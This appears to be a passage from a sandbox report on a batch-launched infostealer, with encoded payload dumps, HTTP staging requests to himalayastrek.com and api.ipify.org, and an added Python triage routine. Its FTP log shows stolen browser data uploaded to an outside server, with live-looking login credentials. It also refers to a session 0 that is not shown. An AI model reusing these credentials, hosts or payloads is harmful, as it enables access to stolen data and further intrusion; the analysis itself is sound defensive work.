                                                                                            2024-10-30 07:34:59 UTC8000INData Raw: 45 4a 4a 6a 7a 39 34 43 75 46 57 61 2b 35 49 6d 4b 4e 49 4d 38 2f 4e 72 31 30 70 74 6d 4e 58 33 49 4c 52 6f 6b 31 35 31 49 70 52 39 67 66 6a 5a 2f 6b 6b 79 76 4e 55 50 4d 4f 49 4c 6b 73 39 73 53 76 4a 31 58 4e 78 45 35 62 7a 6c 64 38 4b 41 69 44 77 63 69 33 4d 69 30 6d 78 42 57 38 73 4a 52 6c 2f 41 78 4a 55 51 4f 4b 5a 30 57 76 75 49 73 59 75 75 68 6e 47 53 51 33 70 36 62 51 32 68 56 62 4f 43 32 52 48 73 64 61 7a 4a 59 41 54 48 77 77 2f 4c 56 32 51 55 64 61 65 6f 31 66 65 38 4f 68 77 6c 33 6c 64 39 49 69 36 7a 52 66 59 6d 6f 43 30 34 67 66 77 56 7a 78 44 30 59 78 67 49 70 74 30 56 47 63 70 6e 42 66 35 50 78 77 35 59 44 4c 30 39 31 45 43 58 30 63 45 73 44 78 57 51 7a 67 39 50 6f 42 68 76 41 6b 73 30 78 5a 47 61 35 45 78 57 5a 71 72 51 69 48 6a 51 38 63 56
                                                                                            Data Ascii: EJJjz94CuFWa+5ImKNIM8/Nr10ptmNX3ILRok151IpR9gfjZ/kkyvNUPMOILks9sSvJ1XNxE5bzld8KAiDwci3Mi0mxBW8sJRl/AxJUQOKZ0WvuIsYuuhnGSQ3p6bQ2hVbOC2RHsdazJYATHww/LV2QUdaeo1fe8Ohwl3ld9Ii6zRfYmoC04gfwVzxD0YxgIpt0VGcpnBf5Pxw5YDL091ECX0cEsDxWQzg9PoBhvAks0xZGa5ExWZqrQiHjQ8cV
                                                                                            2024-10-30 07:34:59 UTC8000INData Raw: 65 31 52 79 54 4f 6c 72 6d 57 66 61 43 6a 4a 55 56 36 44 49 2f 69 7a 69 56 52 38 4e 37 31 4c 35 59 52 2b 59 62 4b 53 79 70 6f 63 2f 63 6c 71 66 6a 6c 54 58 52 49 58 30 67 48 72 34 76 6e 5a 70 63 4b 34 72 4f 2b 31 37 63 78 4c 45 76 66 71 6d 72 36 6c 59 33 4d 76 4e 73 65 36 41 52 4b 7a 4c 4f 4d 31 76 44 46 6b 5a 4f 75 6a 35 67 51 77 52 76 6f 61 55 74 78 36 41 6f 64 53 62 70 48 6b 58 55 67 4c 43 35 79 7a 74 66 54 32 6e 47 30 7a 6a 79 4b 4f 6f 6e 64 44 7a 64 64 6e 42 66 79 39 50 58 68 57 71 54 6f 4a 7a 4d 2b 76 75 6e 5a 6a 79 75 38 51 75 37 6b 6b 4e 30 57 48 4d 56 45 33 54 65 6b 2b 41 30 48 2b 50 57 68 55 33 43 4d 33 61 76 54 2b 4e 4a 2f 6f 33 6c 64 4b 6e 52 30 39 58 4f 2b 69 62 39 41 38 58 36 46 6a 37 4c 67 4e 46 73 5a 64 61 6f 34 64 6b 36 50 37 6d 63 39 4b
                                                                                            Data Ascii: e1RyTOlrmWfaCjJUV6DI/iziVR8N71L5YR+YbKSypoc/clqfjlTXRIX0gHr4vnZpcK4rO+17cxLEvfqmr6lY3MvNse6ARKzLOM1vDFkZOuj5gQwRvoaUtx6AodSbpHkXUgLC5yztfT2nG0zjyKOondDzddnBfy9PXhWqToJzM+vunZjyu8Qu7kkN0WHMVE3Tek+A0H+PWhU3CM3avT+NJ/o3ldKnR09XO+ib9A8X6Fj7LgNFsZdao4dk6P7mc9K
                                                                                            2024-10-30 07:34:59 UTC8000INData Raw: 43 6e 71 47 70 53 68 57 4c 30 41 78 6a 69 67 41 4e 4b 61 41 55 6a 35 47 63 49 46 44 34 70 65 61 68 4f 6a 70 42 4a 6f 67 38 47 78 74 61 64 64 50 49 35 53 62 73 36 38 7a 61 6a 33 67 58 62 6c 63 4f 59 75 57 4a 32 73 32 44 6b 79 4a 72 37 65 4a 32 35 62 4e 48 78 39 58 6e 66 51 2f 75 77 66 4c 4f 48 32 73 37 53 78 67 77 46 2f 31 4a 62 4b 35 35 50 6a 56 4a 53 35 4d 33 71 55 46 75 76 51 4e 4f 4e 50 67 68 4b 75 35 5a 67 74 4f 38 4f 44 79 66 78 35 63 73 2b 32 45 33 45 50 47 31 6e 30 37 2b 6b 47 71 55 70 5a 45 46 46 68 61 73 4e 79 43 63 45 4d 77 43 58 38 41 39 68 33 61 54 73 73 56 39 68 30 53 62 5a 32 58 69 5a 4c 64 34 73 74 79 6d 68 33 64 33 68 52 64 51 36 77 54 4f 67 2b 6d 44 61 6a 75 6c 4f 57 4e 79 44 43 36 79 53 36 68 54 67 72 67 62 58 56 30 7a 73 53 43 4b 45 32
                                                                                            Data Ascii: CnqGpShWL0AxjigANKaAUj5GcIFD4peahOjpBJog8GxtaddPI5Sbs68zaj3gXblcOYuWJ2s2DkyJr7eJ25bNHx9XnfQ/uwfLOH2s7SxgwF/1JbK55PjVJS5M3qUFuvQNONPghKu5ZgtO8ODyfx5cs+2E3EPG1n07+kGqUpZEFFhasNyCcEMwCX8A9h3aTssV9h0SbZ2XiZLd4stymh3d3hRdQ6wTOg+mDajulOWNyDC6yS6hTgrgbXV0zsSCKE2
                                                                                            2024-10-30 07:34:59 UTC8000INData Raw: 41 70 76 62 61 4b 6e 70 51 4b 50 79 71 44 51 71 66 67 79 79 5a 39 4d 58 42 39 6c 33 6a 48 6b 66 37 4d 70 37 6b 4a 71 63 64 72 62 76 79 4d 32 2b 2b 49 54 71 67 64 68 75 76 50 72 32 59 6b 51 34 46 65 74 4c 41 44 31 6d 4f 31 65 69 4c 35 48 6a 57 5a 69 55 36 55 6b 50 58 61 53 2f 57 33 53 2b 39 31 67 4d 43 50 77 76 2b 51 4a 33 43 4c 31 6b 6a 67 32 4b 35 77 72 36 50 79 61 39 65 35 55 48 74 32 4b 75 32 70 42 49 4e 4d 46 2f 72 4b 42 32 74 69 50 4d 39 6b 68 6b 43 6f 48 6c 2f 67 57 47 4d 55 64 4c 70 61 39 4c 34 50 72 5a 64 62 56 64 78 52 52 77 78 57 43 51 70 4e 67 38 66 5a 39 64 43 6c 66 61 39 75 4f 33 57 58 32 4d 6a 6a 4c 70 6d 73 61 6f 43 43 6f 46 33 53 70 70 45 44 58 76 4a 6e 6f 6c 64 7a 41 2b 30 72 56 63 68 75 4a 53 44 68 39 54 6b 6f 55 68 78 37 72 44 67 57 53
                                                                                            Data Ascii: ApvbaKnpQKPyqDQqfgyyZ9MXB9l3jHkf7Mp7kJqcdrbvyM2++ITqgdhuvPr2YkQ4FetLAD1mO1eiL5HjWZiU6UkPXaS/W3S+91gMCPwv+QJ3CL1kjg2K5wr6Pya9e5UHt2Ku2pBINMF/rKB2tiPM9khkCoHl/gWGMUdLpa9L4PrZdbVdxRRwxWCQpNg8fZ9dClfa9uO3WX2MjjLpmsaoCCoF3SppEDXvJnoldzA+0rVchuJSDh9TkoUhx7rDgWS
                                                                                            2024-10-30 07:34:59 UTC8000INData Raw: 69 77 38 72 36 48 2f 78 39 44 4f 62 67 6e 73 53 6d 34 79 4b 36 4e 63 4f 6b 36 66 76 4a 46 56 4e 34 7a 41 68 50 2f 4f 4a 6f 69 7a 34 68 2f 4a 54 31 6b 71 53 7a 31 48 61 75 63 41 65 70 53 68 52 2f 53 71 37 49 6f 2b 48 54 43 72 76 55 59 4b 6c 48 5a 53 47 45 6d 65 66 32 6a 70 46 44 61 41 52 58 48 66 41 6d 68 7a 37 6a 59 76 54 54 67 48 44 41 64 53 4c 65 52 69 32 34 56 4f 63 44 74 46 72 6f 4c 46 50 52 39 32 4f 72 71 66 51 6c 77 4f 42 4f 34 78 39 57 51 76 42 62 4e 37 2f 54 4e 7a 72 50 6b 2f 71 33 31 34 6e 69 57 56 77 53 7a 36 49 67 31 45 70 6d 2b 31 44 58 54 33 53 50 47 2b 70 46 76 50 65 48 74 38 48 5a 73 2b 66 6a 6e 6a 2f 4a 67 78 6e 4f 72 55 67 49 53 65 43 78 44 55 38 70 71 70 48 43 75 78 49 49 52 69 42 35 42 78 32 73 46 64 33 78 78 69 67 78 56 41 32 38 31 64
                                                                                            Data Ascii: iw8r6H/x9DObgnsSm4yK6NcOk6fvJFVN4zAhP/OJoiz4h/JT1kqSz1HaucAepShR/Sq7Io+HTCrvUYKlHZSGEmef2jpFDaARXHfAmhz7jYvTTgHDAdSLeRi24VOcDtFroLFPR92OrqfQlwOBO4x9WQvBbN7/TNzrPk/q314niWVwSz6Ig1Epm+1DXT3SPG+pFvPeHt8HZs+fjnj/JgxnOrUgISeCxDU8pqpHCuxIIRiB5Bx2sFd3xxigxVA281d


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 172.67.74.152 | 443 | 4544 | C:\Users\Public\Libraries\xrbjyllC.pif
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-30 07:35:06 UTC155OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                            Host: api.ipify.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-30 07:35:07 UTC211INHTTP/1.1 200 OK
                                                                                            Date: Wed, 30 Oct 2024 07:35:06 GMT
                                                                                            Content-Type: text/plain
                                                                                            Content-Length: 14
                                                                                            Connection: close
                                                                                            Vary: Origin
                                                                                            cf-cache-status: DYNAMIC
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8da9ba0c2d872e24-DFW
                                                                                            2024-10-30 07:35:07 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38
                                                                                            Data Ascii: 173.254.250.78
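Sessions 0 and 1 above are two distinct stages. In session 0, x.exe fetches a 768392-byte body from himalayastrek.com using the WinHttp.WinHttpRequest.5 COM user agent; the server sends no Content-Type, and the body begins pq6lWSOn... rather than MZ, so what comes back is not a PE but an encoded blob for the loader to decode. In session 1, the renamed copy xrbjyllC.pif asks api.ipify.org for the victim's public address, a step stealers take to tag the exfiltrated data. The Python below is an added triage routine, not part of the Joe Sandbox report: it scores each session on those indicators plus the process path. The session records are constructed from the headers printed above (body prefixes are the first bytes of the Data Ascii rows); the list of IP-lookup hosts and the 256 KiB size threshold are assumptions for the example.

```python
import string

# Constructed sample: HTTP sessions 0 and 1 from the report above, reduced to
# the fields the checks need. Body prefixes are taken from the Data Ascii rows.
SESSIONS = [
    {
        "process": r"C:\Users\user\AppData\Local\Temp\x.exe",
        "host": "himalayastrek.com",
        "request": "GET /origins/233_Cllyjbrxmng HTTP/1.1",
        "user_agent": "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)",
        "response_headers": {"Server": "Apache", "Content-Length": "768392"},
        "body_prefix": b"pq6lWSOnsUsOEiITHScmHSUeHSMUDhYVIR0bEhkiExAhExMeIRAgJh8dIhUdFB0nDg4i",
    },
    {
        "process": r"C:\Users\Public\Libraries\xrbjyllC.pif",
        "host": "api.ipify.org",
        "request": "GET / HTTP/1.1",
        "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0",
        "response_headers": {"Server": "cloudflare", "Content-Type": "text/plain", "Content-Length": "14"},
        "body_prefix": b"173.254.250.78",
    },
]

# Assumptions: which public-IP lookup services to watch, and how large a body
# must be before a missing Content-Type or a non-PE encoded body is worth noting.
IP_LOOKUP_HOSTS = {"api.ipify.org", "ipinfo.io", "checkip.dyndns.org"}
LARGE_BODY = 256 * 1024
B64_ALPHABET = set((string.ascii_letters + string.digits + "+/=").encode())


def triage(session):
    """Return the list of reasons this session looks like a loader or stealer stage."""
    reasons = []
    ua = session["user_agent"]
    hdrs = session["response_headers"]
    body = session["body_prefix"]
    length = int(hdrs.get("Content-Length", "0"))
    proc = session["process"].lower()

    # WinHttpRequest is the COM HTTP client used from scripts and droppers,
    # not a browser; a download with this UA deserves a look on its own.
    if "WinHttp.WinHttpRequest" in ua:
        reasons.append("WinHttpRequest COM user agent: scripted download, not a browser")
    # A large body the server refuses to describe is typical of staged payloads.
    if length >= LARGE_BODY and "Content-Type" not in hdrs:
        reasons.append(f"{length}-byte body served with no Content-Type")
    # Not a PE (no MZ) yet restricted to the base64 alphabet: an encoded
    # payload the downloader decodes in memory rather than a file it runs.
    if length >= LARGE_BODY and not body.startswith(b"MZ") and all(b in B64_ALPHABET for b in body):
        reasons.append("body is not a PE and uses only the base64 alphabet: likely encoded payload")
    if session["host"] in IP_LOOKUP_HOSTS:
        reasons.append("external IP lookup: victim address collection seen in stealers")
    # Network activity from a .pif, from C:\Users\Public or from %TEMP% matches
    # the report's 'Execution from Suspicious Folder' and suspicious-extension hits.
    if proc.endswith(".pif") or proc.startswith(r"c:\users\public") or "\\appdata\\local\\temp\\" in proc:
        reasons.append(f"network activity from suspicious binary location: {session['process']}")
    return reasons


if __name__ == "__main__":
    for s in SESSIONS:
        print(f"{s['host']} via {s['process']}")
        for r in triage(s):
            print(f"  - {r}")
```

The body check only needs the first few hundred bytes, which is all the report prints; running it on a full capture would also let you confirm the Content-Length against the bytes actually transferred.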


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49737 | 50.116.93.185 | 443 | 1440 | C:\Users\Public\Libraries\Cllyjbrx.PIF
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-30 07:35:12 UTC174OUTGET /origins/233_Cllyjbrxmng HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Accept: */*
                                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                            Host: himalayastrek.com
                                                                                            2024-10-30 07:35:12 UTC209INHTTP/1.1 200 OK
                                                                                            Date: Wed, 30 Oct 2024 07:35:12 GMT
                                                                                            Server: Apache
                                                                                            Upgrade: h2,h2c
                                                                                            Connection: Upgrade, close
                                                                                            Last-Modified: Wed, 30 Oct 2024 06:08:38 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 768392


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49740 | 172.67.74.152 | 443 | 4108 | C:\Users\Public\Libraries\xrbjyllC.pif
Timestamp | Bytes transferred | Direction | Data
2024-10-30 07:35:17 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-10-30 07:35:17 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 07:35:17 GMT
Content-Type: text/plain
Content-Length: 14
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8da9ba509b14e80f-DFW
2024-10-30 07:35:17 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38
Data Ascii: 173.254.250.78


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49751 | 50.116.93.185 | 443 | 1068 | C:\Users\Public\Libraries\Cllyjbrx.PIF
Timestamp | Bytes transferred | Direction | Data
2024-10-30 07:35:29 UTC | 174 | OUT | GET /origins/233_Cllyjbrxmng HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: himalayastrek.com
2024-10-30 07:35:29 UTC | 209 | IN | HTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 07:35:29 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Wed, 30 Oct 2024 06:08:38 GMT
Accept-Ranges: bytes
Content-Length: 768392


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49752 | 172.67.74.152 | 443 | 6568 | C:\Users\Public\Libraries\xrbjyllC.pif
Timestamp | Bytes transferred | Direction | Data
2024-10-30 07:35:34 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-10-30 07:35:34 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 07:35:34 GMT
Content-Type: text/plain
Content-Length: 14
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8da9bab9b87de97a-DFW
2024-10-30 07:35:34 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38
Data Ascii: 173.254.250.78


                                                                                             Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                                                             Oct 30, 2024 08:35:09.569416046 CET | 21 | 49734 | 110.4.45.197 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                 220-You are user number 10 of 50 allowed.
                                                                                                 220-Local time is now 15:35. Server port: 21.
                                                                                                 220-This is a private system - No anonymous login
                                                                                                 220-IPv6 connections are also welcome on this server.
                                                                                                 220 You will be disconnected after 15 minutes of inactivity.
                                                                                             Oct 30, 2024 08:35:09.569741011 CET | 49734 | 21 | 192.168.2.4 | 110.4.45.197 | USER origin@haliza.com.my
                                                                                             Oct 30, 2024 08:35:09.908655882 CET | 21 | 49734 | 110.4.45.197 | 192.168.2.4 | 331 User origin@haliza.com.my OK. Password required
                                                                                             Oct 30, 2024 08:35:09.908821106 CET | 49734 | 21 | 192.168.2.4 | 110.4.45.197 | PASS JesusChrist007$
                                                                                             Oct 30, 2024 08:35:10.273730040 CET | 21 | 49734 | 110.4.45.197 | 192.168.2.4 | 230 OK. Current restricted directory is /
                                                                                             Oct 30, 2024 08:35:10.612694979 CET | 21 | 49734 | 110.4.45.197 | 192.168.2.4 | 504 Unknown command
                                                                                             Oct 30, 2024 08:35:10.612874985 CET | 49734 | 21 | 192.168.2.4 | 110.4.45.197 | PWD
                                                                                             Oct 30, 2024 08:35:10.951411963 CET | 21 | 49734 | 110.4.45.197 | 192.168.2.4 | 257 "/" is your current location
                                                                                             Oct 30, 2024 08:35:10.951900005 CET | 49734 | 21 | 192.168.2.4 | 110.4.45.197 | TYPE I
                                                                                             Oct 30, 2024 08:35:11.290183067 CET | 21 | 49734 | 110.4.45.197 | 192.168.2.4 | 200 TYPE is now 8-bit binary
                                                                                             Oct 30, 2024 08:35:11.290445089 CET | 49734 | 21 | 192.168.2.4 | 110.4.45.197 | PASV
                                                                                             Oct 30, 2024 08:35:11.628808975 CET | 21 | 49734 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,198,19)
                                                                                             Oct 30, 2024 08:35:11.635008097 CET | 49734 | 21 | 192.168.2.4 | 110.4.45.197 | STOR CO_Chrome_Default.txt_user-932923_2024_10_30_04_05_07.txt
                                                                                             Oct 30, 2024 08:35:12.535938025 CET | 21 | 49734 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
                                                                                             Oct 30, 2024 08:35:12.868870974 CET | 21 | 49734 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred
                                                                                                 226 0.333 seconds (measured here), 9.82 Kbytes per second
                                                                                             Oct 30, 2024 08:35:12.911962032 CET | 49734 | 21 | 192.168.2.4 | 110.4.45.197 | PASV
                                                                                             Oct 30, 2024 08:35:13.251085043 CET | 21 | 49734 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,217,1)
                                                                                             Oct 30, 2024 08:35:13.348221064 CET | 49734 | 21 | 192.168.2.4 | 110.4.45.197 | STOR CO_Firefox_fqs92o4p.default-release.txt_user-932923_2024_10_30_09_43_49.txt
                                                                                             Oct 30, 2024 08:35:14.264015913 CET | 21 | 49734 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
                                                                                             Oct 30, 2024 08:35:14.599478960 CET | 21 | 49734 | 110.4.45.197 | 192.168.2.4 | 226 File successfully transferred
                                                                                             Oct 30, 2024 08:35:20.865628004 CET | 21 | 49744 | 110.4.45.197 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                 220-You are user number 11 of 50 allowed.
                                                                                                 220-Local time is now 15:35. Server port: 21.
                                                                                                 220-This is a private system - No anonymous login
                                                                                                 220-IPv6 connections are also welcome on this server.
                                                                                                 220 You will be disconnected after 15 minutes of inactivity.
                                                                                             Oct 30, 2024 08:35:20.865926981 CET | 49744 | 21 | 192.168.2.4 | 110.4.45.197 | USER origin@haliza.com.my
                                                                                             Oct 30, 2024 08:35:21.207725048 CET | 21 | 49744 | 110.4.45.197 | 192.168.2.4 | 331 User origin@haliza.com.my OK. Password required
                                                                                             Oct 30, 2024 08:35:21.208947897 CET | 49744 | 21 | 192.168.2.4 | 110.4.45.197 | PASS JesusChrist007$
                                                                                             Oct 30, 2024 08:35:21.581561089 CET | 21 | 49744 | 110.4.45.197 | 192.168.2.4 | 230 OK. Current restricted directory is /
                                                                                             Oct 30, 2024 08:35:21.926707029 CET | 21 | 49744 | 110.4.45.197 | 192.168.2.4 | 504 Unknown command
                                                                                             Oct 30, 2024 08:35:21.926950932 CET | 49744 | 21 | 192.168.2.4 | 110.4.45.197 | PWD
                                                                                             Oct 30, 2024 08:35:22.269224882 CET | 21 | 49744 | 110.4.45.197 | 192.168.2.4 | 257 "/" is your current location
                                                                                             Oct 30, 2024 08:35:22.269404888 CET | 49744 | 21 | 192.168.2.4 | 110.4.45.197 | TYPE I
                                                                                             Oct 30, 2024 08:35:22.611031055 CET | 21 | 49744 | 110.4.45.197 | 192.168.2.4 | 200 TYPE is now 8-bit binary
                                                                                             Oct 30, 2024 08:35:22.614164114 CET | 49744 | 21 | 192.168.2.4 | 110.4.45.197 | PASV
                                                                                             Oct 30, 2024 08:35:22.956015110 CET | 21 | 49744 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,213,73)
                                                                                             Oct 30, 2024 08:35:22.962696075 CET | 49744 | 21 | 192.168.2.4 | 110.4.45.197 | STOR PW_user-932923_2024_10_30_03_35_18.html
                                                                                             Oct 30, 2024 08:35:23.899625063 CET | 21 | 49744 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
                                                                                             Oct 30, 2024 08:35:24.250138044 CET | 21 | 49744 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred
                                                                                                 226 0.352 seconds (measured here), 0.97 Kbytes per second
                                                                                             Oct 30, 2024 08:35:24.370490074 CET | 49744 | 21 | 192.168.2.4 | 110.4.45.197 | PASV
                                                                                             Oct 30, 2024 08:35:24.883752108 CET | 21 | 49744 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,219,211)
                                                                                             Oct 30, 2024 08:35:24.891191006 CET | 49744 | 21 | 192.168.2.4 | 110.4.45.197 | STOR CO_Chrome_Default.txt_user-932923_2024_10_30_09_43_59.txt
                                                                                             Oct 30, 2024 08:35:25.791163921 CET | 21 | 49744 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
                                                                                             Oct 30, 2024 08:35:26.135822058 CET | 21 | 49744 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred
                                                                                                 226 0.345 seconds (measured here), 9.51 Kbytes per second
                                                                                             Oct 30, 2024 08:35:26.136253119 CET | 49744 | 21 | 192.168.2.4 | 110.4.45.197 | PASV
                                                                                             Oct 30, 2024 08:35:26.478383064 CET | 21 | 49744 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,244,2)
                                                                                             Oct 30, 2024 08:35:26.487298012 CET | 49744 | 21 | 192.168.2.4 | 110.4.45.197 | STOR CO_Firefox_fqs92o4p.default-release.txt_user-932923_2024_10_30_12_12_41.txt
                                                                                             Oct 30, 2024 08:35:27.406430006 CET | 21 | 49744 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
                                                                                             Oct 30, 2024 08:35:27.762337923 CET | 21 | 49744 | 110.4.45.197 | 192.168.2.4 | 226 File successfully transferred
                                                                                             Oct 30, 2024 08:35:37.338639975 CET | 21 | 49753 | 110.4.45.197 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                 220-You are user number 10 of 50 allowed.
                                                                                                 220-Local time is now 15:35. Server port: 21.
                                                                                                 220-This is a private system - No anonymous login
                                                                                                 220-IPv6 connections are also welcome on this server.
                                                                                                 220 You will be disconnected after 15 minutes of inactivity.
                                                                                             Oct 30, 2024 08:35:37.340873957 CET | 49753 | 21 | 192.168.2.4 | 110.4.45.197 | USER origin@haliza.com.my
                                                                                             Oct 30, 2024 08:35:37.670998096 CET | 21 | 49753 | 110.4.45.197 | 192.168.2.4 | 331 User origin@haliza.com.my OK. Password required
                                                                                             Oct 30, 2024 08:35:37.675668001 CET | 49753 | 21 | 192.168.2.4 | 110.4.45.197 | PASS JesusChrist007$
                                                                                             Oct 30, 2024 08:35:38.028072119 CET | 21 | 49753 | 110.4.45.197 | 192.168.2.4 | 230 OK. Current restricted directory is /
                                                                                             Oct 30, 2024 08:35:38.361502886 CET | 21 | 49753 | 110.4.45.197 | 192.168.2.4 | 504 Unknown command
                                                                                             Oct 30, 2024 08:35:38.361772060 CET | 49753 | 21 | 192.168.2.4 | 110.4.45.197 | PWD
                                                                                             Oct 30, 2024 08:35:38.690716982 CET | 21 | 49753 | 110.4.45.197 | 192.168.2.4 | 257 "/" is your current location
                                                                                             Oct 30, 2024 08:35:38.690996885 CET | 49753 | 21 | 192.168.2.4 | 110.4.45.197 | TYPE I
                                                                                             Oct 30, 2024 08:35:39.021226883 CET | 21 | 49753 | 110.4.45.197 | 192.168.2.4 | 200 TYPE is now 8-bit binary
                                                                                             Oct 30, 2024 08:35:39.021478891 CET | 49753 | 21 | 192.168.2.4 | 110.4.45.197 | PASV
                                                                                             Oct 30, 2024 08:35:39.351174116 CET | 21 | 49753 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,249,196)
                                                                                             Oct 30, 2024 08:35:39.357736111 CET | 49753 | 21 | 192.168.2.4 | 110.4.45.197 | STOR PW_user-932923_2024_10_30_03_35_35.html
                                                                                             Oct 30, 2024 08:35:40.259845018 CET | 21 | 49753 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
                                                                                             Oct 30, 2024 08:35:40.590024948 CET | 21 | 49753 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred
                                                                                                 226 0.331 seconds (measured here), 1.03 Kbytes per second
                                                                                             Oct 30, 2024 08:35:40.647682905 CET | 49753 | 21 | 192.168.2.4 | 110.4.45.197 | PASV
                                                                                             Oct 30, 2024 08:35:40.984262943 CET | 21 | 49753 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,245,242)
                                                                                             Oct 30, 2024 08:35:40.990443945 CET | 49753 | 21 | 192.168.2.4 | 110.4.45.197 | STOR CO_Chrome_Default.txt_user-932923_2024_10_30_09_44_21.txt
                                                                                             Oct 30, 2024 08:35:41.894920111 CET | 21 | 49753 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
                                                                                             Oct 30, 2024 08:35:42.226413965 CET | 21 | 49753 | 110.4.45.197 | 192.168.2.4 | 226-File successfully transferred
                                                                                                 226 0.333 seconds (measured here), 9.85 Kbytes per second
                                                                                             Oct 30, 2024 08:35:42.226949930 CET | 49753 | 21 | 192.168.2.4 | 110.4.45.197 | PASV
                                                                                             Oct 30, 2024 08:35:42.556190014 CET | 21 | 49753 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,239,11)
                                                                                             Oct 30, 2024 08:35:42.562902927 CET | 49753 | 21 | 192.168.2.4 | 110.4.45.197 | STOR CO_Firefox_fqs92o4p.default-release.txt_user-932923_2024_10_30_12_13_08.txt
                                                                                             Oct 30, 2024 08:35:43.476490974 CET | 21 | 49753 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection
                                                                                             Oct 30, 2024 08:35:43.807782888 CET | 21 | 49753 | 110.4.45.197 | 192.168.2.4 | 226 File successfully transferred
                                                                                             Oct 30, 2024 08:37:04.723928928 CET | 49753 | 21 | 192.168.2.4 | 110.4.45.197 | PASV
                                                                                             Oct 30, 2024 08:37:05.052964926 CET | 21 | 49753 | 110.4.45.197 | 192.168.2.4 | 227 Entering Passive Mode (110,4,45,197,208,121)
                                                                                             Oct 30, 2024 08:37:05.059341908 CET | 49753 | 21 | 192.168.2.4 | 110.4.45.197 | STOR SC_user-932923_2024_10_30_03_37_03.jpeg
                                                                                             Oct 30, 2024 08:37:05.959093094 CET | 21 | 49753 | 110.4.45.197 | 192.168.2.4 | 150 Accepted data connection

                                                                                            Target ID:0
                                                                                            Start time:03:34:56
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "
                                                                                            Imagebase:0x7ff79ac20000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:1
                                                                                            Start time:03:34:56
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
